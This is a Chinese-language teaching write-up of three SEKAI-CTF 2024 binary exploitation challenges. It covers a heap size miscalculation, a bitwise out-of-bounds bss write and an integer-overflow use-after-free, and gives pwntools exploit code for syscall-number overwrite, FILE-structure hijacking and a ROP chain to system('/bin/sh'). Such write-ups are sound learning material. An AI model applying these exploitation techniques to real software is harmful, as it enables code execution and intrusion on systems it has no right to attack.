2024 SEKAI-CTF Pwn题解教学文档<\/h1>

1. nolibc题目解析<\/h2>

1.1 题目概述<\/h3>
保护机制：Partial RELRO, No canary, NX enabled, PIE enabled<\/li>
限制：只能注册一个账户并登录该账户<\/li>
关键漏洞：size是buffer长度不是整个chunk，可以溢出改系统调用号<\/li> <\/ul>
1.2 漏洞分析<\/h3>
char<\/span> *<\/span>__fastcall<\/span> alloc<\/span>(int<\/span> size) {
<\/span><\/span>  struct<\/span> chunk *<\/span>next_use_chunk;
<\/span><\/span>  signed<\/span> int<\/span> up_align_16_size =<\/span> (size +<\/span> 15<\/span>) &<\/span> 0xFFFFFFF0<\/span>;
<\/span><\/span>  \/\/ ...
<\/span><\/span><\/span><\/span>  if<\/span> (v5-><\/span>size >=<\/span> (unsigned<\/span> __int64<\/span>)(up_align_16_size +<\/span> 16LL<\/span>)) {
<\/span><\/span>    next_use_chunk =<\/span> (struct<\/span> chunk *<\/span>)&<\/span>v5-><\/span>buff[up_align_16_size];
<\/span><\/span>    next_use_chunk-><\/span>size =<\/span> v5-><\/span>size -<\/span> up_align_16_size -<\/span> 16<\/span>;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>  }
<\/span><\/span>  \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点：<\/p>

next_use_chunk->size<\/code> 计算错误，导致可以溢出修改后续内存<\/li>
分配的size是输入的len+0x10 & 0xFFFFFFF0，但输入内容的长度是len+1<\/li>
<\/ol>
1.3 利用思路<\/h3>

通过data段残留的PIE地址泄露PIE基址<\/li>
利用size计算错误导致的溢出修改系统调用号<\/li>
通过\/proc\/self\/maps<\/code>泄露地址信息<\/li>
<\/ol>
1.4 EXP关键代码<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>p =<\/span> process(".\/main"<\/span>)
<\/span><\/span>
<\/span><\/span># 注册和登录<\/span>
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>"Choose an option: "<\/span>, str(2<\/span>))
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>"Username: "<\/span>, b<\/span>"llk"<\/span>) 
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>"Password: "<\/span>, b<\/span>"1010"<\/span>) 
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>"Choose an option: "<\/span>, str(1<\/span>))
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>"Username: "<\/span>, b<\/span>"llk"<\/span>) 
<\/span><\/span>p.<\/span>sendlineafter(b<\/span>"Password: "<\/span>, b<\/span>"1010"<\/span>) 
<\/span><\/span>
<\/span><\/span># 利用漏洞<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(191<\/span>):
<\/span><\/span>    add((int("0xe0"<\/span>, 16<\/span>)), "llk"<\/span>)
<\/span><\/span>
<\/span><\/span>add((int("0x7f"<\/span>, 16<\/span>)), 0x70<\/span>*<\/span>b<\/span>"a"<\/span>+<\/span>p32(0<\/span>)+<\/span>p32(1<\/span>)+<\/span>p32(59<\/span>)+<\/span>p32(3<\/span>))
<\/span><\/span>
<\/span><\/span>for<\/span> i in<\/span> range(191<\/span>):
<\/span><\/span>    dele(i)
<\/span><\/span>
<\/span><\/span>load(b<\/span>"\/bin\/sh<\/span>\x00<\/span>"<\/span>)
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>2. speedpwn题目解析<\/h2>
2.1 题目概述<\/h3>

保护机制：Partial RELRO, Canary found, NX enabled, No PIE<\/li>
关键漏洞：game_history溢出可以往高地址处bss任意写<\/li>
<\/ul>
2.2 漏洞分析<\/h3>
if<\/span>(cmp(player_num, bot_num)) {
<\/span><\/span>    *<\/span>((unsigned<\/span> long<\/span> long<\/span>*<\/span>)&<\/span>game_history +<\/span> (number_of_games \/<\/span> 64<\/span>)) |=<\/span> ((unsigned<\/span> long<\/span> long<\/span>)1<\/span> <<<\/span> (number_of_games %<\/span> 64<\/span>));
<\/span><\/span>} else<\/span> {
<\/span><\/span>    *<\/span>((unsigned<\/span> long<\/span> long<\/span>*<\/span>)&<\/span>game_history +<\/span> (number_of_games \/<\/span> 64<\/span>)) &=<\/span> (~<\/span>((unsigned<\/span> long<\/span> long<\/span>)1<\/span> <<<\/span> (number_of_games %<\/span> 64<\/span>)));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点：<\/p>

可以通过发送全为1来设置对应game_history位为1<\/li>
可以通过发送全为0来设置对应game_history位为0<\/li>
可以溢出修改seed_generator文件结构体<\/li>
<\/ol>
2.3 利用思路<\/h3>

通过scanf输入不会改变残留libc地址的特性泄露libc<\/li>
利用残留栈帧上的libc地址进行爆破<\/li>
修改seed_generator文件结构体进行IO劫持<\/li>
<\/ol>
2.4 EXP关键代码<\/h3>
def<\/span> set_1<\/span>():
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>"> "<\/span>, str("f"<\/span>))
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>"Player plays: "<\/span>, str(18446744073709551615<\/span>))
<\/span><\/span>
<\/span><\/span>def<\/span> set_0<\/span>():
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>"> "<\/span>, str("f"<\/span>))
<\/span><\/span>    p.<\/span>sendlineafter(b<\/span>"Player plays: "<\/span>, str(0<\/span>))
<\/span><\/span>
<\/span><\/span># 爆破libc地址<\/span>
<\/span><\/span>for<\/span> i in<\/span> range(48<\/span>,64<\/span>):
<\/span><\/span>    tmp =<\/span> leak_1bit_number_libc |<\/span> 1<\/span> <<<\/span> i 
<\/span><\/span>    simulate("-"<\/span>, tmp)
<\/span><\/span>    # ...<\/span>
<\/span><\/span>
<\/span><\/span># 伪造IO结构体<\/span>
<\/span><\/span>fake_io =<\/span> [
<\/span><\/span>    0x3b687320<\/span>,  # will cover content that lock point with 1<\/span>
<\/span><\/span>    0<\/span>,           # write_base<\/span>
<\/span><\/span>    1<\/span>,           # write_ptr<\/span>
<\/span><\/span>    fake_io_addr,# _wide_data<\/span>
<\/span><\/span>    0<\/span>,           # _wide_data->_IO_write_base<\/span>
<\/span><\/span>    0<\/span>,           # _wide_data->_IO_buf_base<\/span>
<\/span><\/span>    fake_io_addr,# _wide_data->__wide_vtable<\/span>
<\/span><\/span>    libc_base +<\/span> 0x4e720<\/span>,  # system<\/span>
<\/span><\/span>    fake_io_addr +<\/span> 0x100<\/span>, # lock address<\/span>
<\/span><\/span>    0<\/span>,           # mode<\/span>
<\/span><\/span>    libc_base +<\/span> 0x1d2648<\/span> -<\/span> 40<\/span>  # _IO_wfile_jumps-40<\/span>
<\/span><\/span>]
<\/span><\/span>
<\/span><\/span># 写入伪造的IO结构体<\/span>
<\/span><\/span>while<\/span> payload:
<\/span><\/span>    tmp =<\/span> payload[:8<\/span>]
<\/span><\/span>    write_64(u64(tmp))
<\/span><\/span>    payload =<\/span> payload[8<\/span>:]
<\/span><\/span><\/code><\/pre>3. life_simulator_2题目解析<\/h2>
3.1 题目概述<\/h3>

保护机制：全开<\/li>
关键漏洞：整数溢出和逻辑问题<\/li>
<\/ul>
3.2 漏洞分析<\/h3>
void<\/span> Company::<\/span>elapse_week() {
<\/span><\/span>    uint64_t<\/span> total_profit =<\/span> 0<\/span>;
<\/span><\/span>    for<\/span>(auto<\/span> it : this<\/span>-><\/span>projects) {
<\/span><\/span>        total_profit +=<\/span> it-><\/span>generate_profit() -<\/span> it-><\/span>worker_pay();
<\/span><\/span>    }
<\/span><\/span>    this<\/span>-><\/span>company_budget +=<\/span> total_profit;
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    if<\/span>(!<\/span>(company_to_remove-><\/span>number_of_workers() ==<\/span> 0<\/span> ||<\/span> company_to_remove-><\/span>get_company_budget() ==<\/span> 0<\/span>)) {
<\/span><\/span>        std::<\/span>cerr <<<\/span> "ERR: Not Allowed"<\/span> <<<\/span> std::<\/span>endl;
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞点：<\/p>

整数溢出影响company_budget和total_net_worth<\/li>
逻辑判断错误：实际需要number_of_workers() == 0或get_company_budget() == 0才能sell<\/li>
释放不完整，Worker对象未被释放导致UAF<\/li>
<\/ol>
3.3 利用思路<\/h3>

利用整数溢出使company_budget为0<\/li>
通过UAF泄露堆地址和libc地址<\/li>
伪造string对象和vector结构<\/li>
通过move_worker实现任意地址写<\/li>
劫持控制流getshell<\/li>
<\/ol>
3.4 EXP关键代码<\/h3>
# 初始设置<\/span>
<\/span><\/span>add_company(b<\/span>"llk "<\/span>, str(1200<\/span>).<\/span>encode())
<\/span><\/span>add_project(b<\/span>"llk "<\/span>, b<\/span>"pwn "<\/span>, b<\/span>"1000000 "<\/span>)
<\/span><\/span>for<\/span> i in<\/span> range(40<\/span>):
<\/span><\/span>    hire_worker(b<\/span>"llk "<\/span>, b<\/span>"pwn "<\/span>, str(i).<\/span>encode(), str(30<\/span>).<\/span>encode())
<\/span><\/span>
<\/span><\/span># 触发漏洞<\/span>
<\/span><\/span>elapse_week()
<\/span><\/span>sell_company(b<\/span>"llk "<\/span>)
<\/span><\/span>
<\/span><\/span># 泄露堆地址<\/span>
<\/span><\/span>add_company(b<\/span>"llk2 "<\/span>, str(1200<\/span>).<\/span>encode())
<\/span><\/span>add_project(b<\/span>"llk2 "<\/span>, b<\/span>"pwn "<\/span>, b<\/span>"1000000 "<\/span>)
<\/span><\/span>worker_info(str(1<\/span>).<\/span>encode())
<\/span><\/span>heap =<\/span> (int(p.<\/span>recvuntil(b<\/span>"<\/span>\n<\/span>"<\/span>)[:-<\/span>1<\/span>].<\/span>decode('ascii'<\/span>)) <<<\/span> 3<\/span>) -<\/span> 0x13370<\/span>
<\/span><\/span>
<\/span><\/span># 泄露libc地址<\/span>
<\/span><\/span>fake_project =<\/span> payload +<\/span> p64(heap+<\/span>0x13600<\/span>)[:6<\/span>]
<\/span><\/span>add_company(fake_project +<\/span> b<\/span>" "<\/span>, str(1200<\/span>).<\/span>encode())
<\/span><\/span>add_company(b<\/span>"l"<\/span>*<\/span>0x400<\/span> +<\/span> b<\/span>" "<\/span>, str(1200<\/span>).<\/span>encode())
<\/span><\/span>worker_info(str(41<\/span>).<\/span>encode())
<\/span><\/span>libc =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x203b20<\/span>
<\/span><\/span>
<\/span><\/span># 泄露栈地址<\/span>
<\/span><\/span>environ =<\/span> libc +<\/span> 0x20ad58<\/span>
<\/span><\/span>target_leak_libc_chunk =<\/span> environ
<\/span><\/span>fake_project =<\/span> payload +<\/span> p64(heap+<\/span>0x13600<\/span>)[:6<\/span>]
<\/span><\/span>add_company(fake_project +<\/span> b<\/span>" "<\/span>, str(1200<\/span>).<\/span>encode())
<\/span><\/span>worker_info(str(41<\/span>).<\/span>encode())
<\/span><\/span>stack =<\/span> u64(p.<\/span>recv(6<\/span>).<\/span>ljust(8<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)) -<\/span> 0x138<\/span>
<\/span><\/span>
<\/span><\/span># 构造ROP链<\/span>
<\/span><\/span>pop_rdi_ret =<\/span> libc +<\/span> 0x000000000010f75b<\/span>
<\/span><\/span>system =<\/span> libc +<\/span> 0x58740<\/span>
<\/span><\/span>bin_sh =<\/span> libc +<\/span> 0x1cb42f<\/span>
<\/span><\/span>ret =<\/span> libc +<\/span> 0x000000000002882f<\/span>
<\/span><\/span>payload =<\/span> (p64(0<\/span>) +<\/span> p64(0<\/span>) +<\/span> p64(0<\/span>) +<\/span> p64(ret) +<\/span> 
<\/span><\/span>           p64(pop_rdi_ret) +<\/span> p64(bin_sh) +<\/span> p64(system)).<\/span>ljust(0x100<\/span>, b<\/span>"<\/span>\x00<\/span>"<\/span>)
<\/span><\/span>add_company(payload +<\/span> b<\/span>" "<\/span>, str(1008<\/span>).<\/span>encode())
<\/span><\/span><\/code><\/pre>4. 关键知识点总结<\/h2>
4.1 委托构造函数<\/h3>

C++11特性，允许一个构造函数调用同一类中的另一个构造函数<\/li>
语法示例：<\/li>
<\/ul>
class<\/span> Example<\/span> {
<\/span><\/span>public<\/span>:<\/span>
<\/span><\/span>    Example(int<\/span> a, int<\/span> b, int<\/span> c) { \/* 主构造函数 *\/<\/span> }
<\/span><\/span>    Example(int<\/span> a, int<\/span> b) :<\/span> Example(a, b, 0<\/span>) {} \/\/ 委托构造函数
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre>4.2 std::remove和std::erase<\/h3>

"移除-擦除"惯用法：<\/li>
<\/ul>
companies.erase(std::<\/span>remove(companies.begin(), companies.end(), company_to_remove), companies.end());
<\/span><\/span><\/code><\/pre>
std::remove重新排列元素，std::erase真正移除元素<\/li>
注意：仅移除指针，不释放指针指向的内存<\/li>
<\/ul>
4.3 整数溢出利用<\/h3>

当double和uint64_t相乘结果超出uint64_t范围时，转换为uint64_t可能导致溢出为0<\/li>
示例：<\/li>
<\/ul>
uint64_t<\/span> a =<\/span> 18446744073709551615ULL<\/span>;
<\/span><\/span>double<\/span> b =<\/span> 2.0<\/span>;
<\/span><\/span>uint64_t<\/span> result =<\/span> static_cast<\/span><<\/span>uint64_t<\/span>><\/span>(a *<\/span> b); \/\/ 可能溢出为0
<\/span><\/span><\/span><\/code><\/pre>4.4 vector插入逻辑<\/h3>

核心函数：<\/li>
<\/ul>
__int64<\/span> __fastcall<\/span> std::<\/span>vector<<\/span>Worker *>::<\/span>emplace_back<<\/span>Worker *&><\/span>(__int64<\/span> a1, __int64<\/span> a2) {
<\/span><\/span>    if<\/span> (*<\/span>(_QWORD *<\/span>)(a1 +<\/span> 8<\/span>) ==<\/span> *<\/span>(_QWORD *<\/span>)(a1 +<\/span> 16<\/span>)) {
<\/span><\/span>        \/\/ 扩容逻辑
<\/span><\/span><\/span><\/span>    } else<\/span> {
<\/span><\/span>        \/\/ 直接插入逻辑
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
a1 + 8: 当前末尾指针<\/li>
a1 + 16: 容量极限指针<\/li>
<\/ul>
本教学文档详细分析了三个CTF题目的漏洞原理和利用方法，涵盖了堆溢出、UAF、IO劫持、ROP等多种漏洞利用技术，并总结了相关的C++特性知识。<\/p>